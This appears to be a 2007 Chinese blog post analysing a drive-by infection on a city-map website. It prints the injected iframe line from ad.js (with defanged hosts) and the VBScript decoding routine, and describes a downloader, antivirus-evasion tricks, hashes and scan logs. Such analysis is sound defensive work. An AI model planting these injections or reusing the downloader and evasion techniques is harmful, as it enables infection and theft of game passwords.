endurer 原创
2007-03-05 第1版
打开该城市地图网站的网页,瑞星警告发现:Hack.Exploit.Vml.g。
检查网页,发现网页所引用的 images/ad.js 包含代码:
/---
document.writeln("<iframe src=/"hxxp:////m***m**.k****is*163.com//index.html?id=5 /" width=0 height=0><//iframe>");
---/
hxxp://m***m**.k****is*163.com/index.html?id=5 包含代码:
/---
<iframe src="hxxp://web***.7***72*7***6.com/*0****.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://web***.7***72*7***6.com/*0****.htm 的标题为http NO FOUND,内容为VBScript脚本代码,功能是调用自定义函数:
/----
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
----/
对变量t的值进行解密并调用execute()执行。
解密后的代码是VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:33:14
修改时间 : 2007-3-5 12:33:14
访问时间 : 2007-3-5 12:34:20
大小 : 93240 字节 91.56 KB
MD5 : ef70c5791d050cc898319acbb044e847
Kaspersky 报为 Worm.Win32.Viking.ii
0.exe运行后会下载其它恶意文件并感染EXE文件。
下面是0.exe运行后Kaspersky 6的记录:
/----
已检测到: 风险软件 Trojan.generic 运行进程: D:/test/0.exe
已检测到: 木马程序 Trojan-PSW.Win32.Magania.jm 文件: C:/WINNT/system32/wincab.sys
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/WINNT/SMSS.EXE
已检测到: 风险软件 Invader 运行进程: C:/WINNT/SVCHOST.EXE
已检测到: 风险软件 Invader (loader) 运行进程: C:/WINNT/explorer.exe
已检测到: 木马程序 Backdoor.Win32.Agent.alh 文件: C:/WINNT/system32/systemt.exe/UPack
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.gs 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/smsss[1].exe
已检测到: 木马程序 Trojan.Win32.Agent.abf 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/276BATUZ/lsasss[1].exe/PE_Patch/UPack
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/CX67WL2N/avg[1].exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/WINNT/CSRSS.exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/MUT33WP4/datsc[1].exe
已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:/WINNT/10Sy.exe
已检测到: 木马程序 Trojan-PSW.Win32.WOW.ec 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/O56R812F/adobesvc[1].exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/E1ITG5SV/svchots[1].exe
已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/mstcs[1].exe
----/
值得注意的是,病毒会搜索标题为AVP.AlertDialog的 Kaspersky 的警告窗口,模拟点击按钮“允许”和“跳过”
向 Kaspersky 的通知窗口(类名为:AVP.Product_Notification)发送WM_CLOSE消息结束该窗口。
所以用户无法进行操作。
用pe_xscan扫描,发现可疑项:
/---
pe_xscan by Purple Endurer
2007-3-5 12:44:24
Windows 2000 Service Pack 4(5.0.2195)
管理员用户组
[System Process] * 0
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/Explorer.EXE * 928 | 2003-6-20 3:5:4 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.3700.6690 | Windows Explorer | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.3700.6690 | Microsoft Corporation| ? | explorer | EXPLORER.EXE
C:/WINNT/RichDll.dll | 2007-3-5 12:37:41
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/internat.exe * 1176 | 2000-1-10 20:0:0 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2920.0000 | Keyboard Language Indicator Applet | Copyright (C) Microsoft Corp. 1994-1999 | 5.00.2920.0000 | Microsoft Corporation| ? | INTERNAT | INTERNAT.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/Tencent/qq/QQ.exe * 516 | 2006-3-2 8:52:30 | TENCENT QQ | 0, 0, 0, 0 | QQ | Copyright ? 2005 | 0, 0, 0, 0 | TENCENT | | COMQQD | QQ.exe
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/Maxthon/Maxthon.exe * 904 | 2007-2-11 17:46:2 | Maxthon Application | 1, 5, 9, 80 | Maxthon Web Browser | Copyright (C) 2002 | 1, 5, 9, 80 | Maxthon International Ltd. | Maxthon | Maxthon | Maxthon.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/EditPlus 2/editplus.exe * 588 | 2005-12-12 9:32:12 | EditPlus | 2, 2, 1, 330 | EditPlus | Copyright ? 1998-2005 ES-Computing | 2, 2, 1, 330 | ES-Computing | EditPlus | EditPlus | EDITPLUS.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/notepad.exe * 508 | 2000-1-10 20:0:0 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2140.1 | 记事本 | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.2140.1 | Microsoft Corporation| ? | Notepad | NOTEPAD.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/conime.exe * 1476 | 2003-6-20 3:5:4 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2195.6655 | Console IME | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.2195.6655 | Microsoft Corporation| ? | Console | CONIME.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/pe/tools/3.exe * 1508 | 2007-3-5 12:43:37
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
O4 - HKLM/../Run: [wsttrs] C:/WINNT/SVCHOST.EXE
O23 - 服务: shiji (shiji) - C:/WINNT/system32/wincab.sys(手动启动)
---/
文件说明符 : C:/WINNT/system32/wsttrs.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:47
修改时间 : 2007-3-5 12:37:47
访问时间 : 2007-3-5 13:35:18
大小 : 23539 字节 22.1011 KB
MD5 : 6e25ea101a59463623725d6073058dc1
Kaspersky 报为: Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.WLOnline.jcv
文件说明符 : C:/WINNT/RichDll.dll
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:41
修改时间 : 2007-3-5 12:37:41
访问时间 : 2007-3-5 13:38:25
大小 : 29721 字节 29.25 KB
MD5 : a936b1dba52bbbc79cf23f9d965d2646
Kaspersky 报为: Worm.Win32.Viking.ii
文件说明符 : C:/WINNT/SVCHOST.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:46
修改时间 : 2007-3-5 12:37:46
访问时间 : 2007-3-5 13:39:4
大小 : 69859 字节 68.227 KB
MD5 : 2424f02a0ea72ffeae27f8b33fb5dfc9
Kaspersky 报为:Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.Roc.ad
文件说明符 : c:/WINNT/10Sy.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:15
修改时间 : 2007-3-5 13:47:44
访问时间 : 2007-3-5 13:49:17
大小 : 25072 字节 24.496 KB
MD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky 报为:Trojan-Downloader.Win32.Small.czl
瑞星 报为:Trojan.PSW.LMir.mdw
文件说明符 : C:/WINNT/system32/systemt.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:56
修改时间 : 2007-3-5 12:59:27
访问时间 : 2007-3-5 13:0:32
大小 : 26130 字节 25.530 KB
MD5 : 8ae1afdb6a25569a5d55a4eb5389121c
Kaspersky报为: Backdoor.Win32.Agent.alh
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temp/q9xtwt5.dll
属性 : ASH-
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:46
修改时间 : 2007-3-5 12:37:46
访问时间 : 2007-3-5 11:6:31
大小 : 32483 字节 31.739 KB
MD5 : b19d0273f347ed7e3dc4fb95a70f48a4
Kaspersky报为:Trojan-PSW.Win32.Magania.jm.1
瑞星报为:RootKit.Vanti.vr
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/web[1].DLL
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:59:1
修改时间 : 2007-3-5 12:59:1
访问时间 : 2007-3-5 13:27:43
大小 : 17227 字节 16.843 KB
MD5 : c68f384f846fc5943e8470ff37d9111d
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/smsss[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:57
修改时间 : 2007-3-5 12:37:59
访问时间 : 2007-3-5 13:25:55
大小 : 13824 字节 13.512 KB
MD5 : 3f864049a2fde64042a82565d4ff92af
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.gs
瑞星报为:Trojan.PSW.ZhengTu.anc
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/276BATUZ/lsasss[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:0
修改时间 : 2007-3-5 12:38:1
访问时间 : 2007-3-5 13:23:29
大小 : 40968 字节 40.8 KB
MD5 : 23f203134804fa6f2d31667267595dc5
Kaspersky 报为:Trojan.Win32.Agent.abf
瑞星报为::Trojan.Agent.fii
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/CX67WL2N/avg[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:43
修改时间 : 2007-3-5 12:38:6
访问时间 : 2007-3-5 13:21:48
大小 : 13824 字节 13.512 KB
MD5 : 3cec40cb6a2ba1e57c91a083c10b09e4
此文件会复制为:c:/WINNT/SMSS.EXE
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.es
瑞星 报为:Trojan.PSW.OnlineGames.in
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/MUT33WP4/datsc[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:10
修改时间 : 2007-3-5 12:38:10
访问时间 : 2007-3-5 13:17:19
大小 : 13824 字节 13.512 KB
MD5 : a9b8b545f24b36e52fd0176db42becdd
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
瑞星报为::Trojan.PSW.Agent.jdm
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/O56R812F/adobesvc[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:25
修改时间 : 2007-3-5 13:38:28
访问时间 : 2007-3-5 13:15:18
大小 : 226868 字节 221.564 KB
MD5 : 54ce2ffabb6ddefd26d5360d427870c2
Kaspersky报为:Trojan-PSW.Win32.WOW.ec
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/E1ITG5SV/svchots[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:6
修改时间 : 2007-3-5 12:38:32
访问时间 : 2007-3-5 13:13:13
大小 : 14848 字节 14.512 KB
MD5 : a4742619bf2f16aed92fdc8623ad0623
此文件被复制为:c:/WINNT/CSRSS.exe
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/inetinf[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:49
修改时间 : 2007-3-5 12:37:55
访问时间 : 2007-3-5 13:11:9
大小 : 279652 字节 273.100 KB
MD5 : 10a390602afad9926028116607ac094a
此文件被复制为c:/WINNT/SERVICES.EXE
Kaspersky 报为:Backdoor.Win32.Agent.alh
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/mstcs[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:14
修改时间 : 2007-3-5 13:9:58
访问时间 : 2007-3-5 13:10:36
大小 : 25072 字节 24.496 KB
MD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky报为:Trojan-Downloader.Win32.Small.czl
瑞星报为:Trojan.PSW.LMir.mdw